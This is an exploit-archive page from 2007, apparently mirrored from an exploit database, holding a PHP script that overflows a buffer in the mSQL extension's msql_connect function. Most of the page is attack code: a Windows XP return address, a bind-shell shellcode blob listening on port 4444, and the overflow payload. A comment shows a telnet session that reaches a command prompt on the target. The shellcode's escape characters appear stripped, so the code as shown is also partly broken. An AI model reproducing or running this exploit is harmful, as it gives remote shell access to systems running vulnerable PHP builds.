[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP mSQL (msql_connect) Local Buffer Overflow Exploit
# Published : 2007-08-08
# Author : Inphex
# Previous Title : PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit (2)
# Next Title : Live for Speed S1/S2/Demo (.ply file) Buffer Overflow Exploit
<?php
/*
Inphex
317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.
GET /script.php HTTP/1.1n
telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:apache>
*/
if(!function_exists('msql_connect')) {
die('mSQL extension is not available');
}
$ret = "xA3x3Dx92x7C"; #shell32.dll ->CALL EBP WindowsXP
$shellcode=
"xbdxdbxc6x38x8fxd9xc9xd9x74x24xf4x58x31xc9" .
"xb1x51x83xc0x04x31x68x0ex03xb3xc8xdax7axbf" .
"xbfxf1xc8xd7xb9xf9x2cxd8x5ax8dxbfx02xbfx1a" .
"x7ax76x34x60x80xfex4bx76x01xb1x53x03x49x6d" .
"x65xf8x3fxe6x51x75xbex16xa8x49x58x4ax4fx89" .
"x2fx95x91xc0xddx98xd3x3ex29xa1x87xe4xfaxa0" .
"xc2x6exa5x6ex0cx9ax3cxe5x02x17x4axa6x06xa6" .
"xa7x5bx1bx23xbex37x47x2fxa0x04xb6x94x46x01" .
"xfax1ax0cx55xf1xd1x62x49xa4x6dxc2x79xe8x19" .
"x4dx37x1ax36x01x38xf4xa0xf1xa0x91x1fxc4x44" .
"x15x13x1axcbx8dx2cx8ax9bxe6x3exd7x60xa9x3f" .
"xfexc9xc0x25x99x74x3fxadx64x23xaaxacx97x1b" .
"x42x68x6ex6ex3exddx8ex46x12xb1x23x35xc6x76" .
"x97xfaxbbx87xc7x9ax53x69xb4x04xf7x00xa5x5d" .
"x9fxb6x3cx2dxa7xe0xbfx1bx4dx1fx11xf6x6dxcf" .
"xf9x5cx3cxdex10xcbxc0xc9xb0xa6xc1x26x5exad" .
"x77x41xd6x7ax77x9bxb9xd0xd3x71xc5x08x48x11" .
"xdexd1xa9x9bx77xdexe0x09x87xf0x6bxd8x13x96" .
"x1bx7fxb1xdfx39x15x19x86xe8x26x10xdfx81xf2" .
"xaaxfdx67x3bx5fxabx76xf9x8dx55xc4xd2x5ex24" .
"xb3x12xcax9dxefx0bx7ex1fx5cxddx81xaaxe7x1d" .
"xabx0fxbfxb3x05xfex6ex5exa7x51xc0xcbxf6xae" .
"x32x9bx55x89xb6x92xf5xd6x6fx40x05xd7xa7x6a" .
"x29xacx9fx68x49x76x7bx6ex98x24x7bx40x4dx38" .
"x09x65xd1xebxf1xb0x12xdbx0ex3dxed";
//
msql_connect(str_repeat('A',49422)."xebx02".$ret."x15B".$shellcode."");
?>
# www.Syue.com [2007-08-08]